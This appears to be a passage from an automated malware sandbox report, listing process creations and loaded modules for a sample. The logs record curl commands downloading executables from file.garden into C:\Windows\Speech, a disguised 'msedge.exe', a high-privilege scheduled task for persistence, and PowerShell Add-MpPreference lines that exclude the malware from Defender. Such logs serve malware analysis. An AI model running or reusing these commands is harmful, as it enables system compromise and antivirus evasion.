Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Source: unknown	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
